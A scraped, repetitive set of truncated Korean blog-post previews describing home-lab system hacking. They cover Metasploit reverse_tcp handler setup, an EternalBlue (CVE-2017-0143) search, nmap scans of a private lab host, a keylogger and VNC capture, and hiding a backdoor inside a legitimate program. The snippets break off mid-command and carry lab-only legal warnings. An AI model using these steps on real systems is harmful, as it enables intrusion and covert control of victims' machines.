https://hoowave.tistory.com/88 시스템 해킹 - BackDoor 생성!! 실습을 위해서 제가 직접 만든 시스템을 대상으로 정했습니다!!!! 실제 서버를 공격하여 생기는 법적 책임은 본인에게 있음을 경고합니다!! 백도어는 개구멍이라고 생각하시면 편합니다..생hoowave.tistory.com 이전 게시글에 이어서 진행됩니다..!! 실습을 위해서 제가 직접 만든 시스템을 대상으로 정했습니다!!!! 실제 서버를 공격하여 생기는 법적 책임은 본인에게 있음을 경고합니다!!공격자는 공격대기를 위해 msfconsole로 이동합니다..msfconsole 그 후 페이로드를 설정해 줍니다.. 페이로드에서 공격자의 IP와 포트를 다시 설정해 주고.. exploit..!!viewonly 옵션은 공격..
https://hoowave.tistory.com/88 시스템 해킹 - BackDoor 생성!! 실습을 위해서 제가 직접 만든 시스템을 대상으로 정했습니다!!!! 실제 서버를 공격하여 생기는 법적 책임은 본인에게 있음을 경고합니다!! 백도어는 개구멍이라고 생각하시면 편합니다..생hoowave.tistory.com이전 게시글에 이어서 진행됩니다.. !! 실습을 위해서 제가 직접 만든 시스템을 대상으로 정했습니다!!!! 실제 서버를 공격하여 생기는 법적 책임은 본인에게 있음을 경고합니다!!공격자는 공격대기를 위해 msfconsole로 이동합니다.msfconsole 이제 페이로드를 정해줍시다.. use multi/handlerset payload windows/meterperter/reverse_tcpset ..
!! 실습을 위해서 제가 직접 만든 시스템을 대상으로 정했습니다!!!! 실제 서버를 공격하여 생기는 법적 책임은 본인에게 있음을 경고합니다!! 백도어는 개구멍이라고 생각하시면 편합니다..생성한 백도어는 다른 정상적인 프로그램과 합쳐서 대상의 의심을 피한 뒤, 실행하게 되면대상의 PC에서는 백도어가 설정해둔 포트가 열리게 되고 공격자가 시스템을 장악하게 됩니다.골 때리는 녀석이죠..반대로 백도어에 감염되었다면..?조립은 해체의 역순입니다.원하지 않는 포트를 닫아줘야 되니까네트워크를 사용하지 않는 안전 모드에 들어가서 작업을 하시거나랜선 뽑고 뻘짓거리 하는 프로그램이 있는지 확인 먼저 하시면 되겠죠..서론이 너무 길었네요 얼른 바이러스를 만들어보죠.. 공격자 : Kali - 192.168.28.128희생자 ..
https://hoowave.tistory.com/84 윈도우 시스템 해킹 - 사전 정보 수집rHost = Windows 7 Home Basic K, 172.16.234.130lHost = Kali Linux , 172.16.234.129 !! 실습을 위해서 제가 직접 만든 시스템을 대상으로 정했습니다 !!!! 실제 서버를 공격하여 생기는 법적 책임은 본인에게 있음을hoowave.tistory.com이전 게시글에 이어서 진행됩니다.. !! 실습을 위해서 제가 직접 만든 시스템을 대상으로 정했습니다 !!!! 실제 서버를 공격하여 생기는 법적 책임은 본인에게 있음을 경고합니다 !! 키로거 공격에 이어서 VNC를 이용해 희생자 PC 화면을 강제로 불러와볼게요.이전 게시글에서 metasploit 인터페이스에서..
https://hoowave.tistory.com/84 윈도우 시스템 해킹 - 사전 정보 수집rHost = Windows 7 Home Basic K, 172.16.234.130lHost = Kali Linux , 172.16.234.129 !! 실습을 위해서 제가 직접 만든 시스템을 대상으로 정했습니다 !!!! 실제 서버를 공격하여 생기는 법적 책임은 본인에게 있음을hoowave.tistory.com 이전 게시글에 이어서 진행됩니다.. !! 실습을 위해서 제가 직접 만든 시스템을 대상으로 정했습니다 !!!! 실제 서버를 공격하여 생기는 법적 책임은 본인에게 있음을 경고합니다 !!msfconsole 단일 명령어를 통해 metasploit 인터페이스로 접근합니다. search cve-2017-0143 이전 ..
rHost = Windows 7 Home Basic K, 172.16.234.130lHost = Kali Linux , 172.16.234.129 !! 실습을 위해서 제가 직접 만든 시스템을 대상으로 정했습니다 !!!! 실제 서버를 공격하여 생기는 법적 책임은 본인에게 있음을 경고합니다 !! Nmap을 이용해 rHost를 대상으로 OS 스캔을 해봅니다.nmap -O 172.16.234.130 열려있는 포트와 사용 중인 OS가 출력됩니다.다음으로 취약한 포트가 있는지 확인하기 위해 전체 스캔을 진행해 줍니다.nmap -A 172.16.234.130 앞서 스캔 한 정보와 함께 호스트 스크립트 결과를 보시면.. 445번 포트(SMB) 취약점에 대해 정보를 알려줍니다.Nmap에서 제공하는 스크립트 파일을 통..